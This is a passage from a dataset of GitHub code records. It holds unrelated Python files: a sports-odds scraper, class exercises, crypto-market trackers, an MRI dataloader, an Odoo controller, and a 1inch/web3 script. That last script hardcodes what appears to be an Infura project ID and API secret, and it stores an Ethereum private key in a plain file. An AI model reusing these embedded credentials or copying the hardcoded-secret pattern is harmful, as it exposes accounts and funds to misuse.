kf[1]:\n isFirstTeam = False\n elif kf[1] > kf[0]:\n isFirstTeam = False\n else:\n isFirstTeam = True\n print(\"kf team equel\")\n\n ''''''\n ExecReq.clickGetElem(driver, XPath.clickH2H)\n ExecReq.clickGetElem(driver, XPath.clickHomeGame)\n while ExecReq.clickGetElem(driver, XPath.clickMoreHomeGame):\n pass\n\n elem = ExecReq.getElemsByXPath(XPath.homeGame, driver)\n home = parseLastCntWin(elems=elem, isFirstTeam=isFirstTeam)\n if home == False:\n i = skip(i, driver)\n continue\n ''''''\n ''''''\n print('away')\n ExecReq.clickGetElem(driver, XPath.clickAwayGame)\n while ExecReq.clickGetElem(driver, XPath.clickMoreAwayGame):\n pass\n\n elem = ExecReq.getElemsByXPath(XPath.awayGame, driver)\n away = parseLastCntWin(elems=elem, isFirstTeam=isFirstTeam)\n if away == False:\n i = skip(i, driver)\n continue\n ''''''\n newGame = Game(timeMin=timeGame, teams=resCmd, lstHome=home, lstAway=away, elemBase = elemBase)\n lstGame.append(newGame)\n print('add')\n\n driver.close()\n driver.switch_to.window(driver.window_handles[0])\n i += 2\n j += 1\n return lstGame\n except:\n print('Ошибка:\\n', traceback.format_exc())\n\n\ndriver = webdriver.Chrome(\"C:\\\\Users\\\\anton\\\\Desktop\\\\chromedriver.exe\")\n#lstGame = parseMaths(driver, XPath.btnToday)\nlstGame = list()\ngoGameNextDay = True\nwhile True:\n if (datetime.datetime.now().hour >= 1):\n goGameNextDay = True\n if (datetime.datetime.now().hour >= 20):\n lstGame.extend(parseMaths(driver, XPath.btnNextDay, ['США: НБА']))\n goGameNextDay = False\n while len(lstGame) > 0:\n for game in lstGame:\n if game.checkTime():\n print(game.teams)\n try:\n lstGame.remove(game)\n except:\n print('Ошибка:\\n', traceback.format_exc())\n\ndriver.close()\n\n # clickElem(driver, game.elemBase)\n # driver.switch_to.window(driver.window_handles[1])\n # kf = getElemByXPath(\"//*[@id='tab-prematch-odds']\", driver)\n # floatKfFirst = 0.0\n # floatKfSec = 0.0\n # try:\n # floatKfFirst = float(kf.text.split('\\n')[1])\n # floatKfSec = float(kf.text.split('\\n')[3])\n # except:\n # print('Ошибка1111:\\n', traceback.format_exc())\n # driver.close()\n # driver.switch_to.window(driver.window_handles[0])\n # try:\n # lstGame.remove(game)\n # except:\n # print('Ошибка:\\n', traceback.format_exc())\n # continue\n # driver.close()\n # driver.switch_to.window(driver.window_handles[0])\n # if (game.checkGame(floatKfFirst, floatKfSec)):\n # print(game.teams)\n # else:\n # print(\"nope\" + str(game.teams))","repo_name":"AZch/ParseMyScoreBasketball","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30588148982","text":"class Car:\n\n def __init__(self, make, model, year):\n self.make = make\n self.model = model\n self.year = year\n self.odometer = 0\n self.fuel = 70\n\n def drive(self, km):\n l = km / 10\n if l <= self.fuel:\n self.__add_distance(km)\n self.__subtract_fuel(l)\n print('Let’s drive!')\n else:\n print('Need more fuel, please, fill more!')\n\n def __add_distance(self, km):\n self.odometer += km\n\n def __subtract_fuel(self, l):\n self.fuel -= l\n\nmy_car = Car('Honda', 'Civic', 2004)\nprint(my_car.drive(700))\nprint(my_car.drive(701))\n","repo_name":"Argen-Aman/chapter5task3","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43078561499","text":"import requests\nimport pandas as pd\nfrom datetime import datetime\nimport time\n\ndef retrieve_data(symbol, frequency):\n url = f\"https://open-api.coinglass.com/public/v2/perpetual_market?symbol={symbol}\"\n headers = {\n \"accept\": \"application/json\",\n \"coinglassSecret\": \"\"\n }\n\n while True:\n try:\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n data = response.json()[\"data\"][symbol]\n df = pd.DataFrame(data, columns=[\n \"exchangeName\",\n \"price\",\n \"updateTime\",\n \"shortVolUsd\",\n \"longVolUsd\",\n \"buyTurnoverNumber\",\n \"sellTurnoverNumber\",\n ])\n # Sum up values from all exchanges\n price = df[\"price\"].mean()\n buy_turnover_number = df[\"buyTurnoverNumber\"].sum()\n sell_turnover_number = df[\"sellTurnoverNumber\"].sum()\n short_vol_usd = df[\"shortVolUsd\"].sum()\n long_vol_usd = df[\"longVolUsd\"].sum()\n # Convert updateTime to readable date and time\n update_time = datetime.fromtimestamp(df[\"updateTime\"].iloc[0]/1000)\n # Store necessary data in a new DataFrame\n df = pd.DataFrame({\n \"Price\": price,\n \"Symbol\": symbol,\n \"shortVolUsd\": short_vol_usd,\n \"longVolUsd\": long_vol_usd,\n \"buyTurnoverNumber\": buy_turnover_number,\n \"sellTurnoverNumber\": sell_turnover_number,\n \"NetVolUsd\": long_vol_usd - short_vol_usd,\n \"NetTurnoverNumber\": buy_turnover_number - sell_turnover_number,\n \"NetPosition\": (long_vol_usd - short_vol_usd) / price,\n \"UpdateTime\": update_time\n }, index=[0])\n print(df)\n # Log the data to a CSV file\n filename = f\"{symbol}_data.csv\"\n df.to_csv(filename, mode=\"a\", header=False)\n except Exception as e:\n print(f\"An error has occurred: {e}. Restarting the function...\")\n time.sleep(frequency)\n\n\nif __name__ == \"__main__\":\n retrieve_data(\"BTC\", 6)\n","repo_name":"suleymanozkeskin/Cryptocurrency_Perpetual_Market_Tracker_Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31424838585","text":"# -*- coding:utf-8 -*-\n# by look1z\nimport hashlib\na = 'RgYDMllaKzGC'\nbbb = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'\nccc = []\nfor i in range(52):\n ccc.append(i)\n\nmydict = dict(zip(bbb, ccc))\nmydict2 = dict(zip(ccc, bbb))\nb = []\nc = []\nd = []\nfor i in a:\n b.append(i)\n\nfor j in range(12):\n # t = ord(b[j])-ord('a')\n\n t = (21*mydict[b[j]]+8)%52\n t = mydict2[t]\n c.append(t)\nprint (c)\n\npwd = 'BEsTAFFiKney'\ncheckcode = hashlib.md5(pwd).hexdigest()\nprint (checkcode)\n","repo_name":"look1z/wuziqi","sub_path":"UI/111.py","file_name":"111.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25601303315","text":"import sys\ninput = sys.stdin.readline\nn, m = map(int, input().split())\ntrees = list(map(int, input().split()))\n\ncutter_height = 0\nstart = 0\nend = max(trees)\n\nwhile start <= end:\n amount_tree = 0\n middle = (start + end) // 2\n amount_tree = sum(tree-middle if tree > middle else 0 for tree in trees)\n \n if amount_tree >= m:\n cutter_height = middle\n start = middle + 1\n else:\n end = middle - 1\nprint(cutter_height)","repo_name":"joong8812/baekjoon-for-algorithm","sub_path":"백준/Silver/2805. 나무 자르기/나무 자르기.py","file_name":"나무 자르기.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18917384993","text":"from builtins import map\nfrom builtins import range\nfrom builtins import object\nfrom geocal_swig import *\nfrom itertools import chain\nimport multiprocessing\nimport time\n\nclass InterestPointGridRawWrap(object):\n '''Wrapper around _interest_point_grid_raw that can be pickled. \n We can't directly use pool.map on _interest_point_grid_raw because\n python can't pickle a instance function'''\n def __init__(self, fd, img, mask, number_grid_line, \n number_grid_sample, border):\n self.fd = fd\n self.img = img\n self.mask = mask\n self.number_grid_line = number_grid_line\n self.number_grid_sample = number_grid_sample\n self.border = border\n def __call__(self, i):\n res = []\n for j in range(self.number_grid_sample):\n if(self.mask is None):\n r = self.fd._interest_point_grid_raw(self.img, i, j,\n self.number_grid_line, self.number_grid_sample, self.border)\n else:\n r = self.fd._interest_point_grid_raw(self.img, self.mask, i, j,\n self.number_grid_line, self.number_grid_sample, self.border)\n if(r is not None):\n res.append(r)\n return res\n \n# Add some useful functions to FeatureDetector\ndef interest_point_grid(self, img, number_grid_line, number_grid_sample,\n border=0, mask=None, pool = None):\n '''This is used to generate a set of interest points. We divide\n the Image into the given number of grid line and samples, and in\n each grid point find the point with the interest point with the\n greatest weight.\n\n You can optionally specify a border to exclude in the search, this\n is useful when the points will be used for image matching and we\n want to exclude points too close to the edge where the image matching\n will fail.\n\n You can optionally supply a Mask, this will be used to exclude points\n based on for example a land/water mask or a cloud mask. If this is not\n supplied, we look at every point.\n\n You can optionally specify a multiprocessing.Pool if you want to \n collect these points in parallel.\n '''\n res = []\n index_list = list(range(number_grid_line))\n tstart = time.time()\n func = InterestPointGridRawWrap(self, img, mask,\n number_grid_line, number_grid_sample, \n border)\n if(pool):\n res = pool.map(func, index_list)\n else:\n res = list(map(func, index_list))\n # This next command flattens the list\n return list(chain.from_iterable(res))\n\nsetattr(FeatureDetector, \"interest_point_grid\", interest_point_grid)\n\n__all__ = []\n","repo_name":"Cartography-jpl/geocal","sub_path":"python/lib/feature_detector_extension.py","file_name":"feature_detector_extension.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21495354496","text":"'''\nComplete the following 3 searching problems using techniques\nfrom class and from Ch15 of the textbook website\n'''\n\n#1. (7pts) Write code which finds and prints the longest\n# word in the provided dictionary. If there are more\n# than one longest word, print them all.\n\ndictionary_list = []\n\ndictionary = open(\"dictionary.txt\", \"r\")\nfor line in dictionary:\n dictionary_list.append(line.strip())\ndictionary.close()\n\ntop_length = 0\nlongest_words = []\nfor i in range(len(dictionary_list)):\n if len(dictionary_list[i]) > top_length:\n longest_words = []\n top_length = len(dictionary_list[i])\n longest_words.append(dictionary_list[i])\n elif len(dictionary_list[i]) == top_length:\n longest_words.append(dictionary_list[i])\nprint(longest_words)\n\n\n#2. (10pts) Write code which finds\n# The total word count AND average word length\n# in \"AliceInWonderLand.txt\"\n\nimport re\ndef split_line(line):\n # This function takes in a line of text and returns a list of words in the line\n return re.findall('[A-Za-z]+(?:\\'[A-Za-z]+)?', line)\nalice_list = []\nfile = open(\"AliceInWonderLand.txt\", \"r\")\nfor line in file:\n file_line = split_line(line)\n for l in range(len(file_line)):\n alice_list.append(file_line[l])\n\nprint(\"There are\", len(alice_list), \"words in Alice and Wonder Land, \", end=\"\")\n\n\nindex = 0\nfor j in range(len(alice_list)):\n index += len(alice_list[j])\naverage_length = index / len(alice_list)\nprint(\"with an average word length of\", average_length, \"letters.\")\n\n\n# CHOOSE ONE OF THE FOLLOWING TWO PROBLEMS\n\n#3 (13pts) How many times does \"Cheshire\" occur in\"AliceInWonderLand.txt\"?\n# How many times does \"Cat\" occur?\n# How many times does \"Cheshire\" immediately followed by \"Cat\" occur?\nprint(alice_list)\ndef how_many_times(input):\n index = 0\n for k in range(len(alice_list)):\n if alice_list[k].upper() == str(input).upper():\n index += 1\n return index\ndef how_many_sequence(first_word, second_word):\n index = 0\n for m in range(len(alice_list)):\n if alice_list[m].upper() == str(first_word).upper() and m < len(alice_list) - 1:\n if alice_list[m + 1].upper() == str(second_word).upper():\n index += 1\n return index\n\n\nprint(\"The word Cheshire appears\", how_many_times(\"Cheshire\"), \"times.\")\nprint(\"The words Cat appears\", how_many_times(\"Cat\"), \"times.\")\nprint(\"The words Cheshire and Cat appear in sequence\", how_many_sequence(\"Cheshire\", \"Cat\"), \"times.\")\n\n\n#### OR #####\n\n#3 (13pts)Find the most frequently occurring\n# seven letter word in \"AliceInWonderLand.txt\"\n\n# Challenge problem (for fun). What words appear in the text of \"Alice in Wonderland\" that DO NOT occur in \"Alice Through the Looking Glass\". Make a list. You can substitute this for any of the above problems.\n\n\n\n","repo_name":"ParkerCS/ch15-searches-cmoog","sub_path":"ch15ProblemSet.py","file_name":"ch15ProblemSet.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34024034868","text":"\n# \"abc\" -> \"cba\"\n# \"\" -> \"\"\n\n# inv(\"abc\") -> inv(\"bc\") + \"a\" = \"cb\" + \"a\" = \"cba\"\n# inv(\"bc\") = inv(\"c\") + \"b\" = \"c\" + \"b\" = \"cb\"\n# inv(\"c\") = inv(\"\") + \"c\"\n# inv(\"\")\n# \"\"\n\n\n\n# inv(s) = s якщо s - порожній\n# inv(s) = inv(s без першого симола) + перший сивол\n\ndef inv(s):\n if len(s) == 0:\n return s\n else:\n return inv(s[1:]) + s[0]\n\nprint(inv(\"abc\"))\n","repo_name":"krenevych/ClassWork","sub_path":"Stat1/L8/l8_4b.py","file_name":"l8_4b.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11338145912","text":"from torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\n\nfrom monai.transforms import AddChannel\n\nimport numpy as np\n\n#alors comme on appel ce fichier depuis un fichier extérieur, faut repréciser le path d'importation\nfrom Dataloaders.MRI_loader import get_data_dicts, load\nfrom process.utils import to_tensor\n\n\n\"\"\"\nCustom Dataset inheriting from Pytorch Dataset\nTakes a list of IDs used to load data and associated labels (both generated by get_data_dicts.py)\n\"\"\"\n\nclass Registration_dataset(Dataset):\n\n def __init__(self, list_IDs, transform=None, vectorize=False):\n self.list_IDs = list_IDs\n self.transform = transform\n self.vectorize=vectorize\n\n def __len__(self):\n return len(self.list_IDs)\n \n def __getitem__(self, index):\n \"\"\"\n Main function of the CustomDataset class. \n Uses utils.load.py to load data. \n \"\"\"\n item_id_fixed = self.list_IDs[index]\n item_id_moving = self.list_IDs[np.random.randint(0,len(self.list_IDs))] #we select randomly another image to registrate\n \n #fixed_image, moving_image, fixed_mask, moving_mask = load(item_id_fixed, item_id_moving)\n scanners=list(load(item_id_fixed, item_id_moving, self.vectorize))\n\n if self.transform is not None:\n \n if self.vectorize:\n for i, scan in enumerate(scanners):\n if len(scan.shape)>3 :\n scanners[i]=to_tensor(scan,self.transform)\n else :\n scanners[i]=self.transform(scan)\n else :\n for i, scan in enumerate(scanners):\n scanners[i]=self.transform(scan)\n\n return scanners\n \n\n\"\"\"\nGenerated two dataloaders for training and validation.\nUsed utils.get_data_dicts.py to generates the IDs and associated labels in order to instanciate two CustomDatasets.\n\"\"\"\n\ndef get_dataloaders(dataloader_config):\n partition = get_data_dicts(dataloader_config['rootdir'], dataloader_config['valid_ratio'])\n training_set = Registration_dataset(partition['train'],\n dataloader_config['transformation'],\n dataloader_config['vectorize'])\n validation_set = Registration_dataset(partition['validation'], \n dataloader_config['transformation'],\n dataloader_config['vectorize'])\n training_generator = DataLoader(training_set,\n batch_size=dataloader_config['batch_size'],\n shuffle=True)\n validation_generator = DataLoader(validation_set,\n batch_size=dataloader_config['batch_size'],\n shuffle=False)\n return training_generator, validation_generator\n","repo_name":"Sma6500/Last_year_project","sub_path":"src_wth_dice/Dataloaders/registration_loader.py","file_name":"registration_loader.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32049825113","text":"from odoo import http\nfrom odoo.http import request\n\n\nclass Job(http.Controller):\n\n @http.route('/jobs/', auth='public', type='http', website=True)\n def job_application_details(self, **kwargs):\n job_application_details = request.env['job.application'].sudo().search(\n [])\n return request.render('school_management.job_details', {\n 'details': job_application_details})\n\n\nclass desigantion(http.Controller):\n\n MANDETORY_FIELD = [\"name\", \"phone\", \"email\"]\n\n @http.route('/desig/', auth='public', type='http', website=True)\n def job_designation(self, **kwargs):\n designation_details = request.env['job.designation'].sudo().search([])\n\n return request.render('school_management.job_designation', {\n 'des_details': designation_details})\n\n @http.route(['/designation/'], type='http',\n auth='public', website=True)\n def get_click(self, jobs, **kwargs):\n values = {\n 'error': {},\n 'error_message': [],\n 'condition': True\n }\n values.update({'job': jobs.id})\n return request.render(\n 'school_management.create_form', values)\n\n\n # @http.route('/create_job_application', auth='user', type='http',\n # website=True)\n # def create_application(self, **kwargs):\n # values = {\n # 'error': {},\n # 'error_message': [],\n # 'condition': True\n # }\n # if kwargs and request.httprequest.method == 'POST':\n # error, error_message = self.details_form_validate(kwargs)\n\n # values.update({'error': error, 'error_message': error_message})\n # values.update(kwargs)\n # values.update({'condition': values.get('error').get('name', False)})\n # if not error:\n # request.env['job.application'].sudo().create(kwargs)\n # return request.render('school_management.thank_you', {})\n # else:\n # return request.render('school_management.create_form', values)\n\n\n\n # des_id = request.env['job.designation'].sudo().browse(kwargs[\n # 'designation_id'])\n # des_id.sudo().write({'application_ids': [(0, 0, (kwargs))]})\n\n\n def details_form_validate(self, data):\n error = dict()\n error_message = []\n # Validation\n for field_name in self.MANDETORY_FIELD:\n if not data.get(field_name):\n error[field_name] = 'missing'\n if [err for err in error.values() if err == 'missing']:\n error_message.append(('Some required fields are empty.'))\n\n return error, error_message\n\n @http.route('/editable_form/', auth=\"user\", type=\"http\", website=True)\n def edit_form(self, job, **kwargs):\n\n return request.render('school_management.edit_form', {\n 'name': job.name,\n 'id': job.id})\n\n @http.route('/edit_job_details', auth=\"user\", type=\"http\", website=True)\n def edit_details(self, **kwargs):\n des_id = request.env['job.designation'].sudo().browse(kwargs[\n 'designation_id'])\n des_id.sudo().write({'name': kwargs['name']})\n return request.render('school_management.thank_you', {})\n","repo_name":"kinjal-lalani16/school_management_system","sub_path":"school_management/controllers/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74472847079","text":"\"\"\"\r\nModul care gestioneaza firmele\r\n\"\"\"\r\nimport glob\r\nfrom docx import Document\r\nimport re\r\n\r\nLOCATIE_FOLDER_FIRME = r\"./Documente/firme_licitatie/\"\r\nLISTA_FIRME_DISPONIBILE = list()\r\n\r\nclass Firme:\r\n def __init__(self, nume):\r\n \"\"\"\r\n Constructor pentru clasa firma\r\n :param nume: numele firmei\r\n \"\"\"\r\n self.nume = nume\r\n # cream o lista cu toate locomotivele posibile\r\n self.lista_locomotive = list()\r\n self.lista_locomotive.append({'model': 'A', 'cantitate': 30, 'viteza': 100, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0})\r\n self.lista_locomotive.append({'model': 'B', 'cantitate': 60, 'viteza': 80, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0})\r\n self.lista_locomotive.append({'model': 'C', 'cantitate': 30, 'viteza': 150, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0})\r\n self.lista_locomotive.append({'model': 'D', 'cantitate': 50, 'viteza': 70, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0})\r\n self.lista_locomotive.append({'model': 'E', 'cantitate': 45, 'viteza': 75, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0})\r\n # cream o lista cu toate vagoanele posibile\r\n self.lista_vagoane = list()\r\n self.lista_vagoane.append({'model': 'X12', 'cantitate': 2, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Lemn', 'Busteni', 'Fier']})\r\n self.lista_vagoane.append({'model': 'X14', 'cantitate': 4, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Lemn', 'Busteni', 'Fier']})\r\n self.lista_vagoane.append({'model': 'X13', 'cantitate': 5, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Nisip', 'Cherestea', 'Piatra']})\r\n self.lista_vagoane.append({'model': 'X15', 'cantitate': 4, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Nisip', 'Cherestea', 'Piatra']})\r\n self.lista_vagoane.append({'model': 'X24', 'cantitate': 1, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Apa', 'Benzina']})\r\n self.lista_vagoane.append({'model': 'X23', 'cantitate': 5, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Apa', 'Benzina']})\r\n self.lista_vagoane.append({'model': 'X25', 'cantitate': 10, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Apa', 'Benzina']})\r\n self.lista_vagoane.append({'model': 'X5', 'cantitate': 1, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Pasageri']})\r\n self.lista_vagoane.append({'model': 'X10', 'cantitate': 5, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Pasageri']})\r\n self.lista_vagoane.append({'model': 'X30', 'cantitate': 10, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Pasageri']})\r\n\r\n def adauga_locomotiva(self, model, unitati, cost):\r\n for locomotiva in self.lista_locomotive:\r\n if model == locomotiva['model']:\r\n locomotiva['unitati_disponibile'] = unitati\r\n locomotiva['cost'] = cost\r\n break\r\n\r\n def adauga_vagon(self, model, unitati, cost):\r\n for vagoane in self.lista_vagoane:\r\n if model == vagoane['model']:\r\n vagoane['unitati_disponibile'] = unitati\r\n vagoane['cost'] = cost\r\n break\r\n\r\n\r\ndef citire_document_word(cale: str) -> dict:\r\n \"\"\"\r\n Citeste dintr-un word format datele despre o firma\r\n :param cale:\r\n :return: Un dictionar cu datele necesare\r\n \"\"\"\r\n tmp_dict = dict()\r\n document = Document(cale)\r\n print(cale)\r\n for para in document.paragraphs:\r\n # print(para.text)\r\n detalii_firme = para.text\r\n\r\n # am scos numele firmei\r\n nume_regex = r\"(?<=Nume: ).*$\"\r\n nume_firma = re.findall(nume_regex,detalii_firme)\r\n if (nume_firma):\r\n nume_firma = modificare_stringuri(nume_firma)\r\n print(f\"Nume: {nume_firma}\")\r\n tmp_dict['nume'] = nume_firma\r\n\r\n # am scos locomotivele\r\n locomotive_regex = r\"(?<=Locomotive: ).*$\"\r\n detalii_locomotive = re.findall(locomotive_regex,detalii_firme)\r\n if (detalii_locomotive):\r\n # print(detalii_locomotive)\r\n detalii_locomotive = modificare_stringuri(detalii_locomotive)\r\n # print(detalii_locomotive)\r\n locomotives = str(detalii_locomotive).split(\",\")\r\n\r\n locomotives_lista = list()\r\n for locomotive in locomotives:\r\n locomotive_lista = list()\r\n # print((locomotive).lstrip(' '))\r\n locomotive = ((locomotive).lstrip(' '))\r\n locomotive_model_regex = r\"(?<=Model ).*$\"\r\n locomotive_model = re.findall(locomotive_model_regex, locomotive)\r\n # print(locomotive_model)\r\n\r\n locomotive_cantitate_regex = r\"^.*(?= x)\"\r\n locomotive_cantitate = re.findall(locomotive_cantitate_regex, locomotive)\r\n # print(locomotive_cantitate)\r\n locomotive_cantitate = modificare_stringuri(locomotive_cantitate)\r\n locomotive_model = modificare_stringuri(locomotive_model)\r\n print(f\"Locomotive cantitate: {locomotive_cantitate}\")\r\n print(f\"Locomotive model: {locomotive_model}\")\r\n locomotive_lista.append(locomotive_cantitate)\r\n locomotive_lista.append(locomotive_model)\r\n\r\n # cost\r\n # print(f\"Cost: {cale}\")\r\n for para in document.paragraphs:\r\n # print(para.text)\r\n detalii_cost = para.text\r\n\r\n cost_regex_locomotive = fr\"(?<=Model {locomotive_model} ).*(?= RON/h)\"\r\n cost_locomotive = re.findall(cost_regex_locomotive, detalii_cost)\r\n if (cost_locomotive):\r\n cost_locomotive = modificare_stringuri(cost_locomotive)\r\n print(f\"Cost locomotive: {cost_locomotive}\")\r\n locomotive_lista.append(cost_locomotive)\r\n locomotives_lista.append(locomotive_lista)\r\n\r\n tmp_dict['Locomotive'] = locomotives_lista\r\n print(locomotives_lista)\r\n\r\n # am scos vagoanele\r\n vagoane_regex = r\"(?<=Vagoane: ).*$\"\r\n detalii_vagoane = re.findall(vagoane_regex,detalii_firme)\r\n if (detalii_vagoane):\r\n # print(detalii_vagoane)\r\n detalii_vagoane = modificare_stringuri(detalii_vagoane)\r\n # print(detalii_vagoane)\r\n vagons = str(detalii_vagoane).split(\",\")\r\n\r\n vagones_lista = list()\r\n for vagoane in vagons:\r\n vagoane_lista = list()\r\n # print((vagoane).lstrip(' '))\r\n vagoane = ((vagoane).lstrip(' '))\r\n vagoane_model_regex = r\"(?<=Model ).*$\"\r\n vagoane_model = re.findall(vagoane_model_regex,vagoane)\r\n # print(vagoane_model)\r\n\r\n vagoane_cantitate_regex = r\"^.*(?= x)\"\r\n vagoane_cantitate = re.findall(vagoane_cantitate_regex,vagoane)\r\n # print(vagoane_cantitate)\r\n\r\n vagoane_cantitate = modificare_stringuri(vagoane_cantitate)\r\n vagoane_model = modificare_stringuri(vagoane_model)\r\n print(f\"Vagoane cantitate: {vagoane_cantitate}\")\r\n print(f\"Vagoane model: {vagoane_model}\")\r\n vagoane_lista.append(vagoane_cantitate)\r\n vagoane_lista.append(vagoane_model)\r\n\r\n # cost\r\n # print(f\"Cost: {cale}\")\r\n for para in document.paragraphs:\r\n # print(para.text)\r\n detalii_cost = para.text\r\n\r\n cost_regex_vagoane = fr\"(?<=Model {vagoane_model} ).*(?= RON/h)\"\r\n cost_vagoane = re.findall(cost_regex_vagoane, detalii_cost)\r\n if (cost_vagoane):\r\n cost_vagoane = modificare_stringuri(cost_vagoane)\r\n print(f\"Cost vagoane: {cost_vagoane}\")\r\n vagoane_lista.append(cost_vagoane)\r\n\r\n vagones_lista.append(vagoane_lista)\r\n print(vagones_lista)\r\n tmp_dict['Vagoane'] = vagones_lista\r\n\r\n\r\n\r\n # print('TODO: cu ajutorul regex gasiti informatiile din fiecare paragraf')\r\n # Populam tmp_dict\r\n #TODO\r\n # exemplu:\r\n # tmp_dict['nume'] = 'FerovTrans SRL'\r\n # tupla per locomotiva: (cantitate, model, cost)\r\n # tmp_dict['Locomotive'] = [(5, 'C', 20), (2, 'B', 30)]\r\n # # tupla per vagon: (cantitate, model, cost)\r\n # tmp_dict['Vagoane'] = [(6, 'X30', 35), (5, 'X14', 45), (20, 'X25', 60)]\r\n print(tmp_dict)\r\n return tmp_dict\r\n\r\ndef modificare_stringuri(stringuri_de_modificare):\r\n char_de_schimbat = \"[]'\"\r\n for ch in char_de_schimbat:\r\n stringuri_de_modificare = str(stringuri_de_modificare).replace(ch, \"\")\r\n\r\n return stringuri_de_modificare\r\n\r\n\r\n\r\ndef salvam_lista_firme_pe_hard():\r\n #TODO salvam lista cumva :)\r\n #poate txt, poate numpy\r\n pass\r\n\r\n\r\ndef procesare_firme_inscrise():\r\n # aflam toate documentele depuse de firme\r\n lista_fisier = glob.glob(LOCATIE_FOLDER_FIRME + '/*')\r\n # pentru fiecare fisier gasit procesam datele\r\n for file in lista_fisier:\r\n tmp_dict = citire_document_word(file)\r\n\r\n LISTA_FIRME_DISPONIBILE.append(Firme(tmp_dict['nume']))\r\n for element in tmp_dict['Locomotive']:\r\n LISTA_FIRME_DISPONIBILE[-1].adauga_locomotiva(model=element[1], unitati=element[0], cost=element[2])\r\n for element in tmp_dict['Vagoane']:\r\n LISTA_FIRME_DISPONIBILE[-1].adauga_vagon(model=element[1], unitati=element[0], cost=element[2])\r\n\r\n salvam_lista_firme_pe_hard()\r\n\r\n\r\nif __name__ == '__main__':\r\n # firma_1 = Firme(nume='Ion')\r\n # print(firma_1)\r\n procesare_firme_inscrise()\r\n","repo_name":"CipiOrhei/ITSchool_2021","sub_path":"procesare_firme.py","file_name":"procesare_firme.py","file_ext":"py","file_size_in_byte":10081,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38327362450","text":"import requests\nimport json\nimport os\nimport quantumrandom\nimport asyncio\nimport numpy as np\nfrom web3 import middleware\nfrom web3.gas_strategies.time_based import fast_gas_price_strategy\n\nos.environ['WEB3_INFURA_PROJECT_ID'] = '90af2ec8351c43f9b82b17026d01a9a1'\nos.environ['WEB3_INFURA_API_SECRET'] = '4c1dd095f5e7411c9b71668b6770e0be'\nfrom web3.auto.infura import w3\n\nwith open('Chi.abi', 'r') as chi_abi_file:\n chi_abi = json.load(chi_abi_file)\nwith open('Gst2.abi', 'r') as gst2_abi_file:\n gst2_abi = json.load(gst2_abi_file)\nwith open('PrivateKey') as privateKeyFile:\n privateKey = privateKeyFile.read()\n\none_inch_split_abi = json.load(open('SplitContract.abi', 'r'))\nmcd_abi = json.load(open('JoinContract.abi', 'r'))\ntoken_abi = json.load(open('Token.abi', 'r'))\n\nchi_contract_address = w3.toChecksumAddress('0x0000000000004946c0e9F43F4Dee607b0eF1fA1c')\ngst2_contract_address = w3.toChecksumAddress('0x0000000000b3F879cb30FE243b4Dfee438691c04')\none_inch_split_contract = w3.toChecksumAddress('0xC586BeF4a0992C495Cf22e1aeEE4E446CECDee0E')\nloop = asyncio.get_event_loop()\n\n\nclass OneInch:\n def __init__(self):\n # json list of tokens\n self.tokens = any\n\n def list_tokens(self):\n if not self.config_check():\n return\n print(\"Tokens\".format(self.tokens))\n\n def load_tokens(self):\n response = requests.get('https://api.1inch.exchange/v1.1/tokens')\n print(\"Loading tokens, status Code: {}\".format(response.status_code))\n self.tokens = json.loads(response.text)\n\n def token_info(self, token):\n if not self.config_check():\n return\n for key, value in self.tokens.items():\n if key.lower() == token.lower():\n print(value)\n return\n print(\"Not Found\")\n\n def generate_address(self):\n private_key = w3.eth.account.create(quantumrandom.hex(1000, 1000))\n print(private_key.address)\n private_key_file = open(\"PrivateKey\", \"w\")\n private_key_file.write(private_key.privateKey.hex())\n private_key_file.close()\n self.privateKey = privateKeyFile.read()\n print(\"Private key written to file, take care 